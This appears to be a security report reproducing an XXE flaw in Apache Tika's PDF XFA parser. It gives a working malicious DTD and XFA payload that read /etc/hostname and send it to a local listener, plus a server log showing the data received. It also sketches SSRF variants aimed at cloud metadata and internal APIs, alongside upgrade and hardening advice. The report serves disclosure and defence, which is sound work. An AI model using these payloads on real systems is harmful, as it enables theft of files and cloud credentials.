Apache Tika XXE Out-of-Band Data Exfiltration

Summary

Product / Component: Apache Tika (tika-core + tika-parser-pdf-module) - XFA PDF Parser
Impact: Unauthenticated attacker can exfiltrate arbitrary local files from systems parsing malicious PDFs. Data is sent to attacker-controlled servers via HTTP requests, enabling "blind" XXE exploitation where parser output is not visible. Additionally enables SSRF to internal services (cloud metadata endpoints, internal APIs).
Severity: High (CVSS: 9.8 Critical per GHSA)
Affected Versions: tika-core 1.13 - 3.2.1, tika-parser-pdf-module 2.0.0 - 3.2.1
Fixed: Apache Tika 3.2.2 (commit bfee6d5)
Reproduction Status: CONFIRMED (Tika 3.2.1, OpenJDK 21.0.9, Ubuntu 22.04)
Identifiers:
- CVE-2025-54988
- CVE-2025-66516
- GHSA-f58c-gq56-vjjf

Root Cause

Apache Tika's PDF parser delegates XFA (XML Forms Architecture) processing to Xerces XML parser with external entity resolution enabled. When processing a malicious PDF containing an XFA form with a DOCTYPE declaration that references an external DTD:

Tika parses the PDF and encounters the embedded XFA XML
Xerces resolves the external DTD from an attacker-controlled server
The DTD defines parameter entities that:
- Read local files via file:// URIs (e.g., /etc/hostname, /etc/passwd)
- Construct a URL containing the file contents as a parameter
Xerces makes an outbound HTTP request to http://attacker/?data=<file_contents>
The attacker receives the exfiltrated data in their server logs

Key vulnerability characteristics:

Works in "blind" scenarios where parser output isn't returned to the attacker
Silent exfiltration via network - no visible indication in parser output
Can target any file readable by the Tika process
Enables SSRF to internal services (AWS metadata at 169.254.169.254, internal APIs)

The fix in Tika 3.2.2 disables external parameter entity resolution for XFA parsing, preventing the DTD fetch and subsequent data exfiltration.

Attack Chain

┌─────────────────┐     ┌──────────────────┐     ┌─────────────────┐
│ Malicious PDF   │────▶│  Apache Tika     │────▶│ Attacker Server │
│ with XFA + DTD  │     │  3.2.1           │     │ (port 8888)     │
│ reference       │     │                  │     │                 │
└─────────────────┘     └──────────────────┘     └─────────────────┘
                              │                        │
                              │ 1. GET /evil.dtd       │
                              │───────────────────────▶│
                              │                        │
                              │ 2. DTD with entities   │
                              │◀───────────────────────│
                              │                        │
                              │ 3. Read /etc/hostname  │
                              │   (local file)         │
                              │                        │
                              │ 4. GET /?data=<hostname>│
                              │───────────────────────▶│
                              │                        │
                              │     EXFILTRATED!       │

Reproduction

Prerequisites

Java 17+ (tested with OpenJDK 21.0.9)
Python 3.x (for HTTP server and PoC generator)
Git
Network connectivity (or localhost testing)

Automated Reproduction

# Run the reproduction script
./repro/reproduction_steps.sh

The script:

Clones the public PoC from https://github.com/mgthuramoemyint/POC-CVE-2025-54988
Downloads tika-app-3.2.1.jar from Maven Central
Generates malicious PDF (malicious_oob.pdf) with embedded XFA and external DTD reference
Creates evil.dtd that extracts /etc/hostname and sends it to localhost:8888
Starts Python HTTP server on port 8888 to serve DTD and capture exfiltrated data
Executes Tika against the malicious PDF
Verifies the exfiltration by checking server logs

Manual Reproduction

Create the malicious DTD (evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/?data=%file;'>">
%all;

Create PDF with XFA containing:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
  %dtd;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>

Start listener:

python3 -m http.server 8888 --directory /path/to/dtd/

Parse with Tika:

java -jar tika-app-3.2.1.jar malicious.pdf

Check listener logs for exfiltrated data

Evidence

Listener Log (`logs/listener_20251209-152555.log`)

127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /?data=lima-pruva-ghsa-f58c-gq56-vjjf-apache-tika-xxe-oob-e-20251209134317 HTTP/1.1" 200 -

Analysis:

First request: Tika fetched evil.dtd from the attacker server
Second request: Tika sent the contents of /etc/hostname (the VM hostname) in the data parameter
Both requests occurred within the same second, demonstrating immediate exploitation

Environment

Java: OpenJDK 21.0.9
Python: 3.10.12
OS: Ubuntu 22.04 (Lima VM)
Tika Version: 3.2.1 (vulnerable)

Artifacts

Malicious PDF: artifacts/tika-oob-runs/run-*/payload/malicious_oob.pdf
Evil DTD: artifacts/tika-oob-runs/run-*/payload/evil.dtd
Listener logs: logs/listener_*.log
Tika output: logs/tika_*.log
PoC source: artifacts/POC-CVE-2025-54988/

Real-World Attack Scenarios

Scenario 1: Document Processing Service

An organization uses Tika to extract text/metadata from user-uploaded PDFs. An attacker uploads a malicious PDF to exfiltrate:

AWS credentials from ~/.aws/credentials
Environment variables containing secrets
Application configuration files
Database connection strings

Scenario 2: Cloud Metadata SSRF

Attacker crafts DTD to access cloud metadata:

<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

Enables credential theft from AWS, GCP, Azure instances running Tika.

Scenario 3: Internal Network Reconnaissance

Use XXE to probe internal services:

<!ENTITY % file SYSTEM "http://internal-api:8080/health">

Map internal infrastructure and identify additional attack surfaces.

Recommendations

Immediate Mitigations

Upgrade to Tika 3.2.2 or later

<dependency>
    <groupId>org.apache.tika</groupId>
    <artifactId>tika-core</artifactId>
    <version>3.2.2</version>
</dependency>

If upgrade is not immediately possible:
- Disable XFA parsing entirely via tika-config.xml
- Implement network egress filtering to block unexpected outbound requests
- Run Tika in a sandboxed environment with no network access

Defense in Depth

Network Controls:
- Block outbound HTTP/HTTPS from document processing services
- Implement allow-list for necessary external resources
- Monitor for unusual DNS queries or outbound connections
File System Isolation:
- Run Tika with minimal file system permissions
- Use containerization with read-only root filesystem
- Mount only necessary directories
Input Validation:
- Scan uploaded PDFs for suspicious XML structures before processing
- Implement file size limits to prevent resource exhaustion
- Consider using a separate, isolated service for PDF processing
Monitoring:
- Alert on Tika processes making unexpected network connections
- Log all outbound requests from document processing infrastructure
- Monitor for access to sensitive files

References

GHSA-f58c-gq56-vjjf - GitHub Security Advisory
CVE-2025-54988 - CVE Record
CVE-2025-66516 - NVD Entry
Apache Tika Security - Official Security Page
Fix Commit bfee6d5 - Patch Details
POC-CVE-2025-54988 - Public PoC

CWE Classification

CWE-611: Improper Restriction of XML External Entity Reference
CWE-918: Server-Side Request Forgery (SSRF)
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Report Generated: 2025-12-09 Reproduction Status: CONFIRMED Idempotency Verified: Yes (multiple successful runs)

N3mes1s/CVE-2025-66516.md

Select an option

No results found

Select an option

No results found

Apache Tika XXE Out-of-Band Data Exfiltration

Summary

Root Cause

Attack Chain

Reproduction

Prerequisites

Automated Reproduction

Manual Reproduction

Evidence

Listener Log (`logs/listener_20251209-152555.log`)

Environment

Artifacts

Real-World Attack Scenarios

Scenario 1: Document Processing Service

Scenario 2: Cloud Metadata SSRF

Scenario 3: Internal Network Reconnaissance

Recommendations

Immediate Mitigations

Defense in Depth

References

CWE Classification

N3mes1s/CVE-2025-66516.md

Apache Tika XXE Out-of-Band Data Exfiltration

Summary

Root Cause

Attack Chain

Reproduction

Prerequisites

Automated Reproduction

Manual Reproduction

Evidence

Listener Log (logs/listener_20251209-152555.log)

Environment

Artifacts

Real-World Attack Scenarios

Scenario 1: Document Processing Service

Scenario 2: Cloud Metadata SSRF

Scenario 3: Internal Network Reconnaissance

Recommendations

Immediate Mitigations

Defense in Depth

References

CWE Classification

Listener Log (`logs/listener_20251209-152555.log`)